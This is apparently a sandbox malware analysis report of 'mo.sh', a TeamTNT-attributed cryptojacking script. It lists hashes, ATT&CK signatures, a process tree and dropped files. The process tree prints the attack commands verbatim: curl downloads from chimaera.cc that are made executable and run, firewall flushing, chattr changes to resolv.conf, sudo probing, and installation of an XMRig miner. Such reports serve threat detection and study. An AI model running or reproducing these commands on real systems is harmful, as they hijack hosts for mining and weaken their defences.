Analysis
-
max time kernel
26s -
max time network
58s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
29-12-2024 23:10
General
-
Target
SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
-
Size
33KB
-
MD5
dd89ab7314e13989bdcae176a82078ac
-
SHA1
9ed46a6dde1dc1de4eed8185c1d622a5fc97092c
-
SHA256
1b72088fc6d780da95465f80ab26ba094d89232ff30a41b1b0113c355cfffa57
-
SHA512
e56722b308702bec178a1eca47c400af2435b57b190a10307aec0eebdfd4ef04ec6d63302a754b508a62d64668cb7b4edbc596a4e40c409e34b4934265d7db3d
-
SSDEEP
768:DBxlT2wDGWvWCrDN+FylT4hxXpGdKI3oB6RXrsdrCIZMfXxK2eJ5tLW:qWN+Fyl1dRoGrq9W
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 1 TTPs 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 2 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 5 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 IoCs
-
Reads CPU attributes 1 TTPs 6 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh"/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh"1⤵
- Writes DNS configuration
-
/bin/hostnamehostname2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -i "[a]liyun"2⤵
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
/bin/grepgrep -i "[y]unjing"2⤵
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/chattrchattr -ia /etc/resolv.conf2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +i /etc/resolv.conf2⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr -ia / /tmp/ /var/ /var/tmp/2⤵
- Attempts to change immutable files
-
-
/bin/chmodchmod 1777 /tmp/ /var/ /var/tmp/2⤵
- File and Directory Permissions Modification
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
-
/usr/bin/curlcurl -sLk http://chimaera.cc/bin/KBot/x86_64 -o /tmp/.kube2⤵
-
-
/bin/mountmount -o "remount,exec" /tmp2⤵
-
-
/bin/chmodchmod +x /tmp/.kube2⤵
- File and Directory Permissions Modification
-
-
/tmp/.kube./.kube2⤵
-
-
/usr/bin/nprocnproc2⤵
-
-
/bin/sleepsleep 22⤵
-
-
/usr/bin/sudosudo -n true2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tS1Vf-0000Cx-P34⤵
- Reads CPU attributes
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tS1Vf-0000D0-PF4⤵
- Reads CPU attributes
-
-
-
/bin/truetrue3⤵
-
-
-
/usr/bin/sudosudo systemctl stop moneroocean_miner.service2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tS1Vh-0000D5-R94⤵
- Reads CPU attributes
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tS1Vh-0000D8-R94⤵
- Reads CPU attributes
-
-
-
/bin/systemctlsystemctl stop moneroocean_miner.service3⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/usr/bin/killallkillall -9 xmrig2⤵
- Reads runtime system information
-
-
/bin/rmrm -rf /usr/bin/moneroocean2⤵
-
-
/usr/bin/curlcurl -Lk --progress-bar http://chimaera.cc/bin/xmrig.tar.gz -o /var/tmp/xmrig.tar.gz2⤵
-
-
/bin/mkdirmkdir /usr/bin/moneroocean2⤵
-
-
/bin/tartar xf /var/tmp/xmrig.tar.gz -C /usr/bin/moneroocean2⤵
-
-
/bin/rmrm /var/tmp/xmrig.tar.gz2⤵
-
-
/bin/sedsed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /usr/bin/moneroocean/config.json2⤵
- Attempts to change immutable files
-
-
/usr/bin/moneroocean/xmrig/usr/bin/moneroocean/xmrig --help2⤵
-
-
/usr/bin/curlcurl -Lk --progress-bar https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz -o /var/tmp/xmrig.tar.gz2⤵
-
-
/bin/tartar xf /var/tmp/xmrig.tar.gz -C /usr/bin/moneroocean "--strip=1"2⤵
- System Network Configuration Discovery
-
/usr/local/sbin/gzipgzip -d3⤵
-
-
/usr/local/bin/gzipgzip -d3⤵
-
-
/usr/sbin/gzipgzip -d3⤵
-
-
/usr/bin/gzipgzip -d3⤵
-
-
/sbin/gzipgzip -d3⤵
-
-
/bin/gzipgzip -d3⤵
-
-
-
/bin/rmrm /var/tmp/xmrig.tar.gz2⤵
-
-
/bin/sedsed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 0,/" /usr/bin/moneroocean/config.json2⤵
- Attempts to change immutable files
- Write file to user bin folder
-
-
/usr/bin/moneroocean/xmrig/usr/bin/moneroocean/xmrig --help2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
150B
MD51112729fd73ff062c1e14fd8e9020814
SHA1aec9b46501f31325864df398245908f375e488a1
SHA256db937fd53bf47bcb1a3dc46fe1cde31a885468f692c8ab1b9c1b057cf9d89c48
SHA512a2bbb340080977bd5e3a3a1f39564df695499dd52d29b0b5f62a9c419449a053fec24ead234ee5927e594d70135e80791dbd247ed582926cca4467af1966fd49
-
Filesize
2KB
MD561def7b3b98458a40fffa42a19ddf258
SHA11b18a16b8e2950332b8f47f4af6de254fa2313aa
SHA2562c923d8b553bde8ce3167fe83f35a40a712e2bed2b76ebaf5e3e63642d551389
SHA512e2258bb277ff72fc4033979190aa55f87a8fdf8ae2e689456798e2789ce3f3a267d4ea5a4c6d27e8460c553ca7d34a319b79f87bf651d262aec6685aa155d1fc
-
Filesize
2KB
MD561d0d000cefe2eafef865eb5d8f80e48
SHA1ca7dfe310e08ccf05efc425fdeb1d342c7447b90
SHA2562071cc6d2049ed9f12bcd8e901ccb3b564fc63bbfe70943d14a6467452755b2d
SHA512a747d6f98cff630e1b322c4a547876d769e3aad9cebe88ff10e56a386e4b76fc22799ae7b29dc9131af2609dccb522ae66f90f8bb3ce0e2b15cfc61c9eca4c49
-
Filesize
6.0MB
MD59265036fba2393351f88b1aa3fa37969
SHA1ac558b2e2aa5cc9da4134a3430a4626a2b34a7df
SHA256ef11c120fab2129fce6dddb8b007102ef98281e11864386ff09c179c58d1dfe0
SHA51219de0dd54406fd9d1f97f1e8c83c97852768ce2b29f1addf6098ee43db10e0960085ed4ab19a38d4de271e1900436dc9d70be26b23d4beb4d09b27275a8a9c95
-
Filesize
830B
MD562010cdb7f4e6231088612bff6867445
SHA10c1e98f9f914a70546105f6f72e09dd2d11613ab
SHA2563b9b65d7a5f1c8cc9d6ff4cb3c467587e080db155f2b08a850b101e8175e1d9d
SHA512143de65895e0c33caf57c4afb7633986aea0141228d3d69dbee259f4ac37b6237aeb4cce450a8773ac2a177436ffcd1e56d4126a6d0c99de5907d2b955b42079
-
Filesize
1KB
MD516943f571ea23c9efdee6f7189dd35cd
SHA1781b5aa3a4be13c8d631987f8d2622eb2af408b2
SHA25633343be0d351dbb111e4e3ef7156408bf4916c8d8ee5dd9f6c3d772c8b042b34
SHA512390192e1c1d326af5a88256f1e96bb71e2397f9f203fc3f11af1a12b9177cb897f8e1a24e1f00ab6f6a2e60a5a18ddbc7227f42e00601f0b7ce15c9ae4af2df1
-
Filesize
2KB
MD5945129c2adb011b22daf29d11aaa7242
SHA13fdacc36e4a64c0f72d3c4c43b253d02f3dc8c16
SHA25679574fd3584ecd51ac2e1c17e1809c5fd691d0c663f97daa3befd9adedfe662b
SHA512f2d125d18489b14c77a4437649f0b171b16465e4126a30696d714fda8f83b6e3b6d2ad7379543b344b4fda432bbaf14643247aa8a48dfdb15d0540830e9699b1
-
Filesize
3KB
MD586e34b90b9f4a591d1469ba113c676ac
SHA1935ac15fad31c65e763d1599e29c44064a6d0edb
SHA2565eca8098bdb8ef9bc65fc8c982bc8cfce9b94a74cc4573000c1257eb9eb3f29d
SHA512aec1235decfa148ec8c021ec76956c2361bb39385bc7e0e7b68c4785596ca56cd2877722bb552d62d1c23654d39322644b470714df3aa71f5e3995a895425b85
-
Filesize
130B
MD52e2d5a150c0aaced0bfe4d0f37e06c7e
SHA15f42cff654fdd97bf25d70d48e0db823c353752b
SHA2565fa44d16c11f342019eb8e4d5d5441e5007f7499b664ac29e47cef3f145755aa
SHA51230581b6cf3af107395f244d47e58bf262853ea9c31099f2a4436595c1ac866df15cc972b59c8e6f69e20ef26d1208bab4de206ec48b9e388e23e83c21cff3cee
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
147B
MD5228b9e10af7cc3dc7c22a1ff70ba2145
SHA1f94ab42a0751a60db85b35934c859b352b2f1f91
SHA2562f5ef60eaf62bdd44a18ed5747a19f90373d702fea07a283a15b5d94b5ccd068
SHA512ac645878a54a67dc5ec3a5250a48b7665135c91d0040668ea30e6eaed8c0d0d1913df82eb3d0799015798a9fc16893747c950508ca54a0f17a4a75aa276e5e8f
-
Filesize
130B
MD5b3295a6de6f76f98e33161fddd94b5ce
SHA1932502c51fbdc42549ba9c878f84152137355c9a
SHA2564a6572ec93489c228e1eaf0af24dad666f61efe3528e0a062fa3b55a2a21ab6c
SHA512aafba931ca5ece97597805f0a62c50f7b49e6d74629e74d72483c12a5c5751c345e77075c7dd793fa28c58e36f0219a05d31e31b7df6afbb43595404a4bc3a58
-
Filesize
147B
MD598e0cb279a4828a6e225e3a6ba92c402
SHA1b2d88da9950c4136bc0010206deb8e14efa87566
SHA256eb396d9787417150229c763e282c2e34a15ca2aec16c9f1b6a75085ce1ff37c3
SHA51203a717bfa97bbd68f7add769ca778183df44009c5421999c62485d1ee57afc944489bd88ce19b0cb02c152978414acf410aaa3d4ad73a38417533eedf3cc8657
-
Filesize
918B
MD5f685d519d55cd649f566356aeab005ea
SHA150766c668e861dbeab63d15e8e2b15e46311718e
SHA256b00d613cc947635740d8c679e506834da8a96895f9f597ef1155a32edc43bd06
SHA512ddc8a02f715e775119be5904223df7fff19d843141ea1a40b23b9040700d7a57748e1eb751a34dc353e3ece3369a2b6271fbb7d23d9481fba13713e43e47ee0e
-
Filesize
918B
MD55571463135a12871b76ce24447c1b36b
SHA196af203b7dbc5db0ba342fd9fc7bdc0e1b66d798
SHA256261849f19c647c56cfd485c2d3739078d8693d74892ea0085f2f2f9536fd3a0f
SHA512b560fedd28b5cbf00d295302f16757f6495f52cdf0f5038efd191b767634e7d1537a99b4b86011e38c304c528328bfdbaab968d192bcb8665cdc7020cc865a44
-
Filesize
288B
MD5f4e2114bf56e019b122d4595e9f50ba1
SHA1a431fd2eb42d28f2f85fea9e3dbf50ccd945a73b
SHA256bd2b09581321a9da0fc3522893c260d9b0a1add0d2ee310880c1ea23bb571bf9
SHA5122019ac6ce409d360c5ff007d4979c1e2d654357f108eb72f3791e2cc23c1f4ef45533e16fa2e6e81ac06164ffc88a704c0497285d930fc2ea80922442279af7d
-
Filesize
89B
MD508ab03bcc954b06f0dd5406dcd5705cf
SHA160b974e444c6ce2300cd95040f2665a9bc27b4eb
SHA256ba3fc3839870f4faa45f4b9ddd50f9a357edb762c3ef4b43e1ec132d26a8aca1
SHA5121be608f93e8c916a788412e86cb201730a53e4ca866f67ac35510738e1a3abfd33df3ac7a8f44822288d10e656c1976455fe70f0a2636dddc3a11e0e08cbf5a2
-
Filesize
288B
MD5b2bb54f0ce1341a9d68c3ebac68277a8
SHA12174131ef59ed2b0311d8a22a3953412bc1fb2f0
SHA25686261febc6e61bb6e22512d345899c198266b5eed3c48e539df13f0a6ec1f34f
SHA51265965b8bddbedfa7c1cac717416a4f5e92a6ee63399466de0cf3df681df5cb4bdcd8cd9ce1ede1984d4b185845c43ef7817951694d05d40340f5e6399691df10
-
Filesize
89B
MD549ef97f7b7dc7bd12e4d66b11d961b6f
SHA19b5f8774fd7c570188896ceeb1815cf2606b06d6
SHA256273e4274b419a783a950eabc480f5dc7ceb6e38cfa64fa20c095a373a5d30600
SHA5124cee9fced4f04559416b38dd26e616c53c2d6090bf633b1cda4730d6be8b0a263e47dd2d30d271c3470914d7bf8bf64563d5b4ad69394ad504c6d3f158dc7bdd
-
Filesize
89B
MD5a2e7d375b61825b5f15ae0afbeb58870
SHA1cfeaf847b67c3d42bdffd330eb5d6bad4cb94e7e
SHA256a7f27ef48ed664a235ab72b2ca1cd4199aa966b0d2ee14a2d02354a93bebd8e4
SHA512886eab762f988b7ae023a30c5b00849b9140c6c6e6044e398354868571e90b083518207c09e6a5f383d1b4383dc9e8976b9e228f75289271986997f5559eb4d3
-
Filesize
288B
MD5cb452d5f901e5a1b9c234620cf034116
SHA15c0039a1e31cb99c7640ed3d9cbcc8a921a48af9
SHA25665132965cb9b94393ee7c0fa470d93238d9beb44d9cbf08d2798b9c9f01791ee
SHA512023f36eec2e5af14b9047521986a929535bddf91ee9532880d3d3fa8c6e60266287acbcba832cbabc620b3b56270acbabf90b4278160564b27b457fb61767b0a
-
Filesize
89B
MD5b27f79dd8012e184f1a98d858b8a4fca
SHA1cf5039f10c0153a863aaba78814b6c61b8ad3710
SHA2561a91394359d3e24707190d2434f7ea15240cfef814279fcc1c8e54b06bcd4c89
SHA512e2f4ac646a29a7e92a0099479103eee7cb2a4e27e1dcc6a4028ac8a9dee9cc44f12fda07a7b55f71ce50cc52c7b0aa9fa649a3b72d2fbf75e5063a0f925d01a2
-
Filesize
288B
MD5098d8b7403d163fb5d44c1c99fc43c2a
SHA127ba1e5d678e369c546a23f6bbbd985fefb80e60
SHA2561c5608665cdd918e6ea432c02b5c3e6987294520b5484b58331b60f79c40c2bc
SHA512c6dc52e0cc1cf785a4815f77a2445d046bc3b3aea3d4b932b3f7979cf0b15001e5d23f0ddb7ed47ed9045af21054ade3edd6e7caadf3c8bf59c58298281bfdf3
-
Filesize
2.4MB
MD5cf928f3590039dc1558cb7b8573d02d2
SHA1fb69049e1112929ae7e9745eb1bcfadfaeaf553b
SHA256be225e89211a3667e758a133bf75270daf1bb000672b5b4ba7b6337166e1c6f7
SHA512a6fb723d64f00280a7b81d54687610de374c877bffe82e6ef93a034f30440841b04800714802029c4e9832282f8e6f27dacae3f32f2b676afcc106caf33c29ce